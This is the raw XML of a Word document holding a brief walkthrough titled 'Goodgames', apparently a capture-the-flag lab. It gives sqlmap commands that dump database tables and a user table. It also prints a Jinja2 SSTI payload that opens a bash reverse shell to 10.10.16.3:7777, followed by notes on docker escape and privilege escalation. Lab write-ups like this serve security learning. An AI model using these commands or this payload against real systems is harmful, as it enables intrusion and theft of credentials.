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3012ED" w14:textId="013D765D" w:rsidR="00C727DA" w:rsidRDefault="008E2AB9">
      <w:r>
        <w:t>Goodgames Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B5E84C" w14:textId="360D16FF" w:rsidR="0028760F" w:rsidRDefault="0028760F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F38155F" wp14:editId="18F89C40">
            <wp:extent cx="5943600" cy="1116330"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="2" name="Picture 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captur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9DDC" w14:textId="265EEC5F" w:rsidR="0028760F" w:rsidRDefault="0028760F"/>
    <w:p w14:paraId="229EBE46" w14:textId="411EBA8F" w:rsidR="0028760F" w:rsidRDefault="0028760F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43862755" wp14:editId="748099B2">
            <wp:extent cx="5943600" cy="15144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C6E8" w14:textId="58B5DA42" w:rsidR="003A6364" w:rsidRDefault="003A6364">
      <w:r w:rsidRPr="003A6364">
        <w:t xml:space="preserve">sqlmap -r reqlog -level=5 --risk=3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0E7206" w14:textId="1FCF196D" w:rsidR="003A6364" w:rsidRDefault="003A6364">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29D4ACF6" wp14:editId="3D3521F1">
            <wp:extent cx="5943600" cy="753110"/>
            <wp:effectExtent l="0" t="0" r="0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3C91" w14:textId="29E0FE07" w:rsidR="00D9718F" w:rsidRDefault="00D9718F">
      <w:r>
        <w:t xml:space="preserve">Obtain tables </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377E1528" w14:textId="0E0E8BF9" w:rsidR="00D9718F" w:rsidRDefault="00D9718F">
      <w:r w:rsidRPr="003A6364">
        <w:t>sqlmap -r reqlog -level=5 --risk=3</w:t>
      </w:r>
      <w:r w:rsidR="00AF34CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B584D">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00AF34CF">
        <w:t>tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792E9700" w14:textId="77777777" w:rsidR="008B584D" w:rsidRDefault="008B584D"/>
    <w:p w14:paraId="0B068A4C" w14:textId="5F1C83E8" w:rsidR="00D9718F" w:rsidRDefault="00D9718F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6518A87C" wp14:editId="298811CC">
            <wp:extent cx="5943600" cy="4166235"/>
            <wp:effectExtent l="0" t="0" r="0" b="571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D3AD0" w14:textId="42C4273A" w:rsidR="008B584D" w:rsidRDefault="008B584D">
      <w:r w:rsidRPr="008B584D">
        <w:t xml:space="preserve">sqlmap -r reqlog -level=5 --risk=3 -T user </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="008B584D">
        <w:t>dump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> // as user seems interesting here </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A21C185" w14:textId="7C0A0944" w:rsidR="003C207E" w:rsidRDefault="003C207E"/>
    <w:p w14:paraId="281282F2" w14:textId="0F1EB165" w:rsidR="003C207E" w:rsidRDefault="003C207E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53DD87A0" wp14:editId="5745BCE9">
            <wp:extent cx="5943600" cy="228917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23FE" w14:textId="71CF99CC" w:rsidR="00AA21BD" w:rsidRDefault="00AA21BD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="213932E9" wp14:editId="399E0A7E">
            <wp:extent cx="5943600" cy="3994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2D15" w14:textId="31191CE8" w:rsidR="00DD2DC7" w:rsidRDefault="00DD2DC7">
      <w:r>
        <w:t>After logging we get to see another url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B76ABED" w14:textId="35C39672" w:rsidR="00DD2DC7" w:rsidRDefault="00DD2DC7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C55C67F" wp14:editId="09BD1462">
            <wp:extent cx="5943600" cy="22358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58A6" w14:textId="501A133D" w:rsidR="00DD2DC7" w:rsidRDefault="00DD2DC7">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> lets add the url to hosts</w:t>
      </w:r>
      <w:r w:rsidR="004E6BE8">
        <w:t>, will reach it to find a flash page can login it with admin credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1360E8D3" w14:textId="3E708EB7" w:rsidR="00472F11" w:rsidRDefault="00472F11">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="682FE1EB" wp14:editId="6FA5E69E">
            <wp:extent cx="5943600" cy="277050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DB6B" w14:textId="04318904" w:rsidR="00E05D55" w:rsidRDefault="00E05D55"/>
    <w:p w14:paraId="7B621CB7" w14:textId="6BC93905" w:rsidR="00E05D55" w:rsidRDefault="00E05D55">
      <w:r>
        <w:t xml:space="preserve">Try adding RCE on flash application form </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219D7612" w14:textId="30C750C1" w:rsidR="00E05D55" w:rsidRDefault="00E05D55"/>
    <w:p w14:paraId="6971C923" w14:textId="1AB70C7D" w:rsidR="00E05D55" w:rsidRDefault="00E05D55">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FFE33F0" wp14:editId="313D60CB">
            <wp:extent cx="5943600" cy="1687195"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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C87C" w14:textId="056C5F7B" w:rsidR="00E05D55" w:rsidRDefault="00E05D55">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> getting response can use SSTI here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2997A5B0" w14:textId="468C63C1" w:rsidR="008B000C" w:rsidRDefault="008B000C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="707E7AE3" wp14:editId="6C79C4EB">
            <wp:extent cx="5943600" cy="1770380"/>
            <wp:effectExtent l="0" t="0" r="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C845" w14:textId="149EBACA" w:rsidR="00AA0660" w:rsidRDefault="00AA0660"/>
    <w:p w14:paraId="287081F2" w14:textId="208AC8A9" w:rsidR="00AA0660" w:rsidRDefault="00AA0660">
      <w:r>
        <w:t>So RCE is working</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0740C055" w14:textId="6C8443F4" w:rsidR="00AA0660" w:rsidRDefault="00AA0660">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C19C700" wp14:editId="7A4D2489">
            <wp:extent cx="5943600" cy="2308225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="Picture 1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D8C9" w14:textId="621A73D6" w:rsidR="00BE692F" w:rsidRDefault="00BE692F">
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA85149" w14:textId="4FE5A8B2" w:rsidR="00BE692F" w:rsidRDefault="00BE692F">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BE692F">
        <w:t>{{ self</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BE692F">
        <w:t>._TemplateReference__context.namespace.__init__.__globals__.os.popen('bash -c "bash -i &gt;&amp; /dev/tcp/10.10.16.3/7777 0&gt;&amp;1"').read() }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38858CB5" w14:textId="7673BFA3" w:rsidR="00BE692F" w:rsidRDefault="00BE692F"/>
    <w:p w14:paraId="518BBFC8" w14:textId="3B8F6B9D" w:rsidR="00BE692F" w:rsidRDefault="00BE692F">
      <w:r>
        <w:t xml:space="preserve">On </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>invstigation ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> it shows the shell is for docker privileges </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08202BB9" w14:textId="41F17E77" w:rsidR="00862B9C" w:rsidRDefault="00862B9C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2474A92B" wp14:editId="233EF95F">
            <wp:extent cx="5943600" cy="45383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639C" w14:textId="7ACEEBB7" w:rsidR="00862B9C" w:rsidRDefault="00862B9C">
      <w:r>
        <w:t xml:space="preserve">We see a internal </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ip ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> so use nmap binary to scan host target m/c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F35CC34" w14:textId="6D12853D" w:rsidR="00B446EB" w:rsidRDefault="00B446EB">
      <w:r>
        <w:t xml:space="preserve">So using http server opening wget in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>shell  download</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> nmap and run the nmap scan over the internal ip </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8E779B" w14:textId="28CC84E0" w:rsidR="00B446EB" w:rsidRDefault="00B446EB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21541859" wp14:editId="27291DF9">
            <wp:extent cx="5943600" cy="2413635"/>
            <wp:effectExtent l="0" t="0" r="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4750" w14:textId="5D469BE8" w:rsidR="000C0496" w:rsidRDefault="000C0496"/>
    <w:p w14:paraId="78D7F6EF" w14:textId="5E19851F" w:rsidR="000C0496" w:rsidRDefault="00C642B3">
      <w:r>
        <w:t>Now give bash privileges using docker shell and make the root environment accessible by augustus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1496CCF8" w14:textId="7841FFA3" w:rsidR="000C0496" w:rsidRDefault="000C0496"/>
    <w:p w14:paraId="16F8FD3D" w14:textId="6917CBB9" w:rsidR="000C0496" w:rsidRDefault="000C0496"/>
    <w:p w14:paraId="50EF6BBF" w14:textId="2B7CA575" w:rsidR="000C0496" w:rsidRDefault="00F64BB4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67E45643" wp14:editId="28C590EF">
            <wp:extent cx="5943600" cy="4561840"/>
            <wp:effectExtent l="0" t="0" r="0" b="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4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60F"/>
    <w:rsid w:val="000C0496"/>
    <w:rsid w:val="000C0CB4"/>
    <w:rsid w:val="0028760F"/>
    <w:rsid w:val="003A6364"/>
    <w:rsid w:val="003C207E"/>
    <w:rsid w:val="00472F11"/>
    <w:rsid w:val="004E6BE8"/>
    <w:rsid w:val="00862B9C"/>
    <w:rsid w:val="008B000C"/>
    <w:rsid w:val="008B584D"/>
    <w:rsid w:val="008E2AB9"/>
    <w:rsid w:val="00A27C4E"/>
    <w:rsid w:val="00AA0660"/>
    <w:rsid w:val="00AA21BD"/>
    <w:rsid w:val="00AF34CF"/>
    <w:rsid w:val="00B446EB"/>
    <w:rsid w:val="00BE692F"/>
    <w:rsid w:val="00C642B3"/>
    <w:rsid w:val="00C727DA"/>
    <w:rsid w:val="00D9718F"/>
    <w:rsid w:val="00DD2DC7"/>
    <w:rsid w:val="00E05D55"/>
    <w:rsid w:val="00F64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DBF69"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{70FEDAD7-9E2C-4445-901B-8843F3B47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6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aamir</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>syed aamir</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-08-14T14:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-14T19:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>